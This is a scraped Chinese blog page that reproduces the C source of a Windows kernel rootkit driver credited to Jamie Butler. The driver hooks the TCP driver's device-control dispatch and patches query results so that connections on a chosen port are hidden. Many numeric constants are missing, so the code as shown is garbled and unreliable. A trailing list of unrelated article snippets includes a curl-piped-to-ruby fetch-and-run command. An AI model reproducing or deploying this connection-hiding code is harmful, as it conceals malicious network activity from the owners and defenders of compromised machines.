隐藏tcp端口,来自看雪

///////////////////////////////////////////////////////////////////////////////////////

// Filename Rootkit.c

//

// Author: Jamie Butler

// Email:  james.butler@hbgary.com or butlerjr@acm.org

//

// Description: This is where the work gets done.

//

// Version: 1.0

// 

#include "ntddk.h"

#include "tdiinfo.h"

//#include "stdio.h"

//#include "stdlib.h"

#include "Rootkit.h"

NTSTATUS DriverEntry(

                   IN PDRIVER_OBJECT  DriverObject,

                   IN PUNICODE_STRING RegistryPath

                    )

{

    NTSTATUS                ntStatus;

    OldIrpMjDeviceControl = NULL;

    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();

    if(!NT_SUCCESS(ntStatus))

        return ntStatus;

    return STATUS_SUCCESS;

}

NTSTATUS InstallTCPDriverHook()

{

    NTSTATUS       ntStatus;

//  UNICODE_STRING deviceNameUnicodeString;

//  UNICODE_STRING deviceLinkUnicodeString;

    UNICODE_STRING deviceTCPUnicodeString;

    WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";

    pFile_tcp  = NULL;

    pDev_tcp   = NULL;

    pDrv_tcpip = NULL;

    RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);

    ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);

    if(!NT_SUCCESS(ntStatus))

    {

        DbgPrint("读取失败!");

        return ntStatus;

    }

    DbgPrint("读取成功!");

    pDrv_tcpip = pDev_tcp->DriverObject;

    OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];

    if (OldIrpMjDeviceControl)

        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;

}

NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)

{

    PIO_STACK_LOCATION      irpStack;

    ULONG                   ioTransferType;

    TDIObjectID             *inputBuffer;

    DWORD                    context;

    //DbgPrint("The current IRP is at %x\n", Irp);

    // Get a pointer to the current location in the Irp. This is where

    // the function codes and parameters are located.

    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction)

    {

        case IRP_MJ_DEVICE_CONTROL:

            if ((irpStack->MinorFunction == ) && \

                (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))

            {

                ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;

                ioTransferType &= ;

                if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer

                {

                    inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                    // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP

                    if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)

                    {

                        DbgPrint("Input buffer %x\n",inputBuffer);

                        if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))

                        {

                            // Call our completion routine if IRP successful

                            irpStack->Control = ;

                            irpStack->Control |= SL_INVOKE_ON_SUCCESS; 

                            // Save old completion routine if present

                            irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));

                            ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;

                            ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;

                            // Setup our function to be called on completion of IRP

                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;

                        }

                    }

                }

            }

        break;

        default:

        break;

    }

    return OldIrpMjDeviceControl(DeviceObject, Irp);

}

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,

                             IN PIRP Irp,

                             IN PVOID Context)

{

    PVOID OutputBuffer;

    DWORD NumOutputBuffers;

    PIO_COMPLETION_ROUTINE p_compRoutine;

    DWORD i;

    // Connection status values:

    // 0 = Invisible

    // 1 = CLOSED

    // 2 = LISTENING

    // 3 = SYN_SENT

    // 4 = SYN_RECEIVED

    // 5 = ESTABLISHED

    // 6 = FIN_WAIT_1

    // 7 = FIN_WAIT_2

    // 8 = CLOSE_WAIT

    // 9 = CLOSING

    // ...

    OutputBuffer = Irp->UserBuffer;

    p_compRoutine = ((PREQINFO)Context)->OldCompletion;

    if (((PREQINFO)Context)->ReqType == 0x101)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == )

                ((PCONNINFO101)OutputBuffer)[i].status = ;

        }

    }

    else if (((PREQINFO)Context)->ReqType == 0x102)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == )

                ((PCONNINFO102)OutputBuffer)[i].status = ;

        }

    }

    else if (((PREQINFO)Context)->ReqType == 0x110)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == )

                ((PCONNINFO110)OutputBuffer)[i].status = ;

        }

    }

    ExFreePool(Context);

    /*

    for(i = 0; i < NumOutputBuffers; i++)

    {

        DbgPrint("Status: %d",OutputBuffer[i].status);

        DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));

        DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));

    }*/

    if ((Irp->StackCount > (ULONG)) && (p_compRoutine != NULL))

    {

        return (p_compRoutine)(DeviceObject, Irp, NULL);

    }

    else

    {

        return Irp->IoStatus.Status;

    }

}

NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)

{

    if (OldIrpMjDeviceControl)

        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);

    if (pFile_tcp != NULL)

        ObDereferenceObject(pFile_tcp);

    pFile_tcp = NULL;

    return STATUS_SUCCESS;

}

HideTcpip.c的更多相关文章

随机推荐

  1. Matrix Factorization in RecSys

    矩阵分解在推荐系统中的应用. 参考链接:知乎. 传统SVD,Funk-SVD,Bias-SVD,SVD++. SVD奇异值分解及其意义. 漫谈奇异值分解.

  2. 清除LabVIEW中波形图表或波形图中的历史数据

    清除LabVIEW中波形图表或波形图中的历史数据 方法一: 前面板中右键单击波形图表或波形图,选择数据操作>>清除图表或数据操作>>清除图形 方法二:(编程方法) 用于清除图表 ...

  3. 谷歌插件学习笔记:把iframe干掉……

    好久不写博客了,感觉自己变得越来越懒了,是没有时间吗?不是,是自己变得越来越懒了,好多东西不愿意去总结了,可能也是学的不精总结不出来什么玩意儿.不过,一切都是借口.还是坚持学习,坚持写博客吧,虽然写的 ...

  4. 关于redis的主从、哨兵、集群(转)

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明.本文链接:https://blog.csdn.net/c295477887/article/de ...

  5. 【数据库】-各类数据库链接驱动和URL的书写格式

    oracle: driver="oracle.jdbc.driver.OracleDriver" url="jdbc:oracle:thin:@localhost:152 ...

  6. 1、Socket通信

    [TCP] 服务器端:无目标插座升级为有目标插座后,就可以通过有目标的插座收发数据 客户端: 实战:此案例有利于理解Socket的工作流程. 缺点:服务器只能接收1个客户端的连接,因为只写了一个Acc ...

  7. 十进制数转N进制c++实现

    编写一个算法,将一个非负的十进制整数N转换为另一个基数为B的B进制整数. #include <iostream> #include<string.h> using namesp ...

  8. 2019暑假集训 windy数

    题目描述 Windy 定义了一种 Windy 数:不含前导零且相邻两个数字之差至少为2的正整数被称为 Windy 数. Windy 想知道,在A和B之间,包括A和B,总共有多少个 Windy 数? 输 ...

  9. 卸载brew

    /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/uninst ...

  10. mac 强行关掉php

    sudo pkill -INT -o php-fpm//重启php sudo php-fpm //mac brew安装的php可以使用这个开启brew services start homebrew/ ...